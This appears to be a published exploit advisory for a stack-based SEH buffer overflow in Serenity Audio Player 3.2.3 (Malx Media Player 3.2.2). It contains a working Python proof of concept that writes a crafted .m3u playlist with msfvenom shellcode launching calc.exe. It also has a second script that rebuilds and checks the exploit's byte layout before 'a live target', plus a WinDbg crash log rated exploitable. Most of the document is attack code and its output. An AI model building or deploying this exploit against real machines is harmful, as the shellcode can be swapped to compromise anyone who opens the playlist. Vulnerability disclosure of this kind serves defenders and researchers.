Serenity is a playlist-based audio player for Windows. It features a clean and simple interface with minimal overhead. Supported formats are limited only by the codecs and drivers installed on the machine.
SEH-based local buffer overflow in Serenity Audio Player 3.2.3 (formerly known as Malx Media Player): an overlong line in a crafted .m3u playlist overwrites the structured exception handler record on the stack, and the POC below uses that to run calc.exe when the playlist is opened.
Discovered by: Arjun Basnet, Cyber Security Works Pvt. Ltd.
Affected Version:
Serenity Audio Player 3.2.3
Malx media player 3.2.2
Earlier versions may also be affected (not checked)
Software link: http://malsmith.kyabram.biz/serenity/
The vulnerability was tested on:
Windows XP SP2 and Windows 7; other versions of Windows may also be affected (not checked)
POC video:
http://youtu.be/ZMC-URZagMg
POC exploit code:
-------------------------------------------------------------------------------------------------------------------------
#!/usr/bin/env python
# Serenity Audio Player 3.2.3 / Malx Media Player 3.2.2 - SEH buffer overflow POC
# Writes exploit.m3u; open it in the player to trigger the overflow.
# All data is kept as bytes and written in binary mode so the payload is not
# altered by text-mode newline translation or (under Python 3) re-encoding.
# header (the 1011-byte padding below is measured from the end of these bytes)
buffer = b"M3U"
buffer += b"#EXTM3"
buffer += b"A" * 1011
# nSEH: short JMP +6 (EB 06) skips over the 4-byte handler address into the NOP sled
buffer += b"\xEB\x06\x90\x90"
# SEH handler: 0x00404AE3, little-endian; an address inside the main image,
# which loads at 0x00400000 (see the ModLoad list in the crash analysis below)
buffer += b"\xE3\x4A\x40\x00"
buffer += b"\x90" * 30
# msfvenom -p windows/exec EXITFUNC=seh CMD=calc.exe -f c -a x86 -b "\x0a\x1a"
#Payload size: 220 bytes
#BadCharacters: \x0a\x1a
buffer += (b"\xb8\xc2\x04\xed\x11\xd9\xc5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
b"\x31\x31\x43\x13\x03\x43\x13\x83\xc3\xc6\xe6\x18\xed\x2e\x64"
b"\xe2\x0e\xae\x09\x6a\xeb\x9f\x09\x08\x7f\x8f\xb9\x5a\x2d\x23"
b"\x31\x0e\xc6\xb0\x37\x87\xe9\x71\xfd\xf1\xc4\x82\xae\xc2\x47"
b"\x00\xad\x16\xa8\x39\x7e\x6b\xa9\x7e\x63\x86\xfb\xd7\xef\x35"
b"\xec\x5c\xa5\x85\x87\x2e\x2b\x8e\x74\xe6\x4a\xbf\x2a\x7d\x15"
b"\x1f\xcc\x52\x2d\x16\xd6\xb7\x08\xe0\x6d\x03\xe6\xf3\xa7\x5a"
b"\x07\x5f\x86\x53\xfa\xa1\xce\x53\xe5\xd7\x26\xa0\x98\xef\xfc"
b"\xdb\x46\x65\xe7\x7b\x0c\xdd\xc3\x7a\xc1\xb8\x80\x70\xae\xcf"
b"\xcf\x94\x31\x03\x64\xa0\xba\xa2\xab\x21\xf8\x80\x6f\x6a\x5a"
b"\xa8\x36\xd6\x0d\xd5\x29\xb9\xf2\x73\x21\x57\xe6\x09\x68\x3d"
b"\xf9\x9c\x16\x73\xf9\x9e\x18\x23\x92\xaf\x93\xac\xe5\x2f\x76"
b"\x89\x14\xc1\x4b\x07\x80\x78\x3e\x6a\xcc\x7a\x94\xa8\xe9\xf8"
b"\x1d\x50\x0e\xe0\x57\x55\x4a\xa6\x84\x27\xc3\x43\xab\x94\xe4"
b"\x41\xc8\x7b\x77\x09\x21\x1e\xff\xa8\x3d")
file = "exploit.m3u"
with open(file, "wb") as f:
    f.write(buffer)
----------------------------------------------------------------------------------------------------------------------------------
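Before pointing a file-format SEH exploit at a live target it pays to check the layout of the file itself. The script below is an added example and is not part of the original advisory or the vendor's software: it rebuilds the exact bytes the POC above writes (header, padding, nSEH, SEH, sled and the msfvenom payload are all taken from the POC) and reports the offsets at which nSEH and the handler address land, decodes the short JMP in nSEH to confirm it lands inside the NOP sled rather than on the handler DWORD, scans the shellcode for the bad characters it was encoded against, and lists the 0x00 bytes present in both the handler address 0x00404AE3 and the payload. Those nulls are not in the bad-character set the POC was generated with, so the POC relies on the playlist parser copying past 0x00; the checker makes that dependency visible. Nothing here touches the target, it only inspects the constructed file. Python 3 is assumed.

```python
"""Layout check for the Serenity/Malx M3U SEH overflow POC.

Added example, not code from the original advisory: rebuilds the bytes the
POC writes and verifies the things an exploit developer checks before
running a file-format SEH exploit against a live target.
"""
import struct

# Building blocks copied from the POC above (header bytes, padding length,
# nSEH/SEH values, NOP sled and the msfvenom payload are the author's).
HEADER = b"M3U" + b"#EXTM3"
PAD_LEN = 1011
NSEH = b"\xEB\x06\x90\x90"            # short JMP +6, then two NOPs
SEH_HANDLER = 0x00404AE3              # written little-endian as E3 4A 40 00
SLED = b"\x90" * 30
BAD_CHARS = b"\x0a\x1a"               # the set the payload was encoded against
SHELLCODE = (b"\xb8\xc2\x04\xed\x11\xd9\xc5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
             b"\x31\x31\x43\x13\x03\x43\x13\x83\xc3\xc6\xe6\x18\xed\x2e\x64"
             b"\xe2\x0e\xae\x09\x6a\xeb\x9f\x09\x08\x7f\x8f\xb9\x5a\x2d\x23"
             b"\x31\x0e\xc6\xb0\x37\x87\xe9\x71\xfd\xf1\xc4\x82\xae\xc2\x47"
             b"\x00\xad\x16\xa8\x39\x7e\x6b\xa9\x7e\x63\x86\xfb\xd7\xef\x35"
             b"\xec\x5c\xa5\x85\x87\x2e\x2b\x8e\x74\xe6\x4a\xbf\x2a\x7d\x15"
             b"\x1f\xcc\x52\x2d\x16\xd6\xb7\x08\xe0\x6d\x03\xe6\xf3\xa7\x5a"
             b"\x07\x5f\x86\x53\xfa\xa1\xce\x53\xe5\xd7\x26\xa0\x98\xef\xfc"
             b"\xdb\x46\x65\xe7\x7b\x0c\xdd\xc3\x7a\xc1\xb8\x80\x70\xae\xcf"
             b"\xcf\x94\x31\x03\x64\xa0\xba\xa2\xab\x21\xf8\x80\x6f\x6a\x5a"
             b"\xa8\x36\xd6\x0d\xd5\x29\xb9\xf2\x73\x21\x57\xe6\x09\x68\x3d"
             b"\xf9\x9c\x16\x73\xf9\x9e\x18\x23\x92\xaf\x93\xac\xe5\x2f\x76"
             b"\x89\x14\xc1\x4b\x07\x80\x78\x3e\x6a\xcc\x7a\x94\xa8\xe9\xf8"
             b"\x1d\x50\x0e\xe0\x57\x55\x4a\xa6\x84\x27\xc3\x43\xab\x94\xe4"
             b"\x41\xc8\x7b\x77\x09\x21\x1e\xff\xa8\x3d")


def build_m3u():
    """Return the file contents the POC writes to exploit.m3u."""
    return (HEADER + b"A" * PAD_LEN + NSEH
            + struct.pack("<I", SEH_HANDLER) + SLED + SHELLCODE)


def layout():
    """File offset of each field, derived from the field lengths."""
    nseh = len(HEADER) + PAD_LEN
    seh = nseh + 4
    sled = seh + 4
    shellcode = sled + len(SLED)
    return {"nseh": nseh, "seh": seh, "sled": sled,
            "shellcode": shellcode, "total": shellcode + len(SHELLCODE)}


def seh_handler(buf):
    """Handler address as the exception dispatcher reads it (LE DWORD)."""
    off = layout()["seh"]
    return struct.unpack("<I", buf[off:off + 4])[0]


def short_jump_target(buf, off):
    """Decode the 2-byte short JMP (EB rel8) at buf[off] and return the file
    offset it lands on; rel8 is relative to the end of the instruction."""
    if buf[off] != 0xEB:
        raise ValueError("no short JMP (EB) at offset %d" % off)
    rel = struct.unpack("<b", buf[off + 1:off + 2])[0]
    return off + 2 + rel


def find_bytes(data, wanted):
    """Offsets within data of every byte that is in the wanted set."""
    return [i for i, b in enumerate(data) if b in wanted]


def check_poc():
    """Run every check and return the findings."""
    buf = build_m3u()
    lay = layout()
    target = short_jump_target(buf, lay["nseh"])
    return {
        "size": len(buf),
        "handler": seh_handler(buf),
        # the jump must land in the sled, not on the handler DWORD itself
        "jump_lands_in_sled": lay["sled"] <= target < lay["shellcode"],
        "bad_chars_in_shellcode": find_bytes(SHELLCODE, BAD_CHARS),
        # 0x00 is not in BAD_CHARS, so nulls pass through; list where they are
        "nulls_in_shellcode": find_bytes(SHELLCODE, b"\x00"),
        "nulls_in_handler": find_bytes(struct.pack("<I", SEH_HANDLER), b"\x00"),
    }


if __name__ == "__main__":
    for key, value in check_poc().items():
        print("%-24s %s" % (key, hex(value) if key == "handler" else value))
```

Run it stand-alone to print the report; with the POC's values nSEH lands at offset 1020, the handler at 1024, the JMP resolves to 1028 (the first NOP), the payload is clean of \x0a and \x1a, and one 0x00 sits in the payload plus the top byte of the handler address. Changing PAD_LEN or the handler address and re-running is a quick way to catch an off-by-four before a retest in the debugger.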
Crash analysis (WinDbg session and !exploitable output):
Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.
Symbol search path is: SRV*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00400000 0040a000 image00400000
ModLoad: 7c900000 7c9af000 ntdll.dll
|.
. 0 id: 1418 create name: image00400000
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll
ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\COMCTL32.dll
ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll
ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll
ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
ModLoad: 10000000 100b9000 C:\WINDOWS\system32\rlls.dll
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 74c80000 74cac000 C:\WINDOWS\system32\OLEACC.dll
ModLoad: 76080000 760e5000 C:\WINDOWS\system32\MSVCP60.dll
ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll
ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 78050000 78120000 C:\WINDOWS\system32\WININET.dll
ModLoad: 01ce0000 01ce9000 C:\WINDOWS\system32\Normaliz.dll
ModLoad: 78000000 78045000 C:\WINDOWS\system32\iertutil.dll
ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll
(1418.1124): C++ EH exception - code e06d7363 (first chance)
ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
ModLoad: 767f0000 76817000 C:\WINDOWS\system32\Schannel.dll
ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll
ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\USERENV.dll
ModLoad: 029a0000 029f8000 C:\WINDOWS\system32\LavasoftTcpService.dll
ModLoad: 71a50000 71a8f000 C:\WINDOWS\system32\MSWSOCK.dll
ModLoad: 76d60000 76d79000 C:\WINDOWS\system32\IPHLPAPI.DLL
(1418.173c): Unknown exception - code c0000096 (first chance)
(1418.173c): Unknown exception - code c0000096 (!!! second chance !!!)
r
eax=00000000 ebx=00000000 ecx=77c40ad6 edx=01ab0fe8 esi=00401270 edi=0012fbb7
eip=00400055 esp=0012fb90 ebp=0012fe18 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x55:
00400055 6f outs dx,dword ptr [esi] ds:0023:00401270=0824448b
rF
fpcw=027F: rn 53 puozdi fpsw=4000: top=0 cc=1000 -------- fptw=FFFF
fopcode=0000 fpip=001b:5ad72985 fpdp=0023:0012fb30
st0=-1.253621103784834226700e-1829 st1= 0.000000003250463689420e+1720
st2= 0.000000923709286317790e-4933 st3= 5.030055843417188097910e-4932
st4=-2.532331139691264054760e+3433 st5= 1.000000000000000000000e+0000
st6= 1.000000000000000000000e+0000 st7= 1.000000000000000000000e+0000
image00400000+0x55:
00400055 6f outs dx,dword ptr [esi] ds:0023:00401270=0824448b
rX
xmm0=0 1.8357e-043 -0.0146141 -1.02234
xmm1=-0.0146141 -1.52194e-005 -1.02234 -1.52193e-005
xmm2=1.4013e-045 -0.0147865 -1.522e-005 -1.00728
xmm3=1.74424e-039 -1.#QNAN 8.26766e-044 -1.52198e-005
xmm4=6.43282e+037 8.26766e-044 1.74228e-039 0
xmm5=4.90454e-044 1.74227e-039 8.15556e-043 3.78351e-044
xmm6=-1.52193e-005 3.02814e+016 0 1.74084e-039
xmm7=1.68436e-042 7.00649e-044 1.63952e-042 2.00015
image00400000+0x55:
00400055 6f outs dx,dword ptr [esi] ds:0023:00401270=0824448b
kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012fe18 7e418816 00401270 006d01f4 00000601 image00400000+0x55
0012fe80 7e4189cd 00000000 00401270 006d01f4 USER32!UserCallWinProcCheckWow+0x150
0012fee0 7e4196c7 0012ff0c 00000001 7e42fac4 USER32!DispatchMessageWorker+0x306
0012fef0 00401244 0012ff0c 0012ffc0 00000000 USER32!DispatchMessageA+0xf
0012ff24 00404ff6 00400000 00000000 0015eff3 image00400000+0x1244
0012ffc0 7c817067 00000000 00000000 7ffd9000 image00400000+0x4ff6
0012fff0 00000000 00404ec2 00000000 78746341 kernel32!BaseProcessStart+0x23
.load C:\peach\bin\msec.dll
!exploitable -m
IDENTITY:HostMachine\HostUser
PROCESSOR:X86
CLASS:USER
QUALIFIER:USER_PROCESS
EVENT:DEBUG_EVENT_EXCEPTION
EXCEPTION_FAULTING_ADDRESS:0x400055
EXCEPTION_CODE:0xC0000096
EXCEPTION_LEVEL:SECOND_CHANCE
EXCEPTION_TYPE:STATUS_PRIVILEGED_INSTRUCTION
MAJOR_HASH:0x5e212578
MINOR_HASH:0x3a4f4f12
STACK_DEPTH:7
STACK_FRAME:image00400000+0x55
STACK_FRAME:USER32!UserCallWinProcCheckWow+0x150
STACK_FRAME:USER32!DispatchMessageWorker+0x306
STACK_FRAME:USER32!DispatchMessageA+0xf
STACK_FRAME:image00400000+0x1244
STACK_FRAME:image00400000+0x4ff6
STACK_FRAME:kernel32!BaseProcessStart+0x23
INSTRUCTION_ADDRESS:0x0000000000400055
INVOKING_STACK_FRAME:0
DESCRIPTION:Privileged Instruction Violation
SHORT_DESCRIPTION:PrivilegedInstruction
CLASSIFICATION:EXPLOITABLE
BUG_TITLE:Exploitable - Privileged Instruction Violation starting at image00400000+0x0000000000000055 (Hash=0x5e212578.0x3a4f4f12)
EXPLANATION:A privileged instruction exception indicates that the attacker controls execution flow.